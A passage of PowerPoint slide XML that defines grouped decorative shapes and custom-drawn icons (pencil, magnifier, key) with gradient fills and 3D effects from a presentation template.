                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
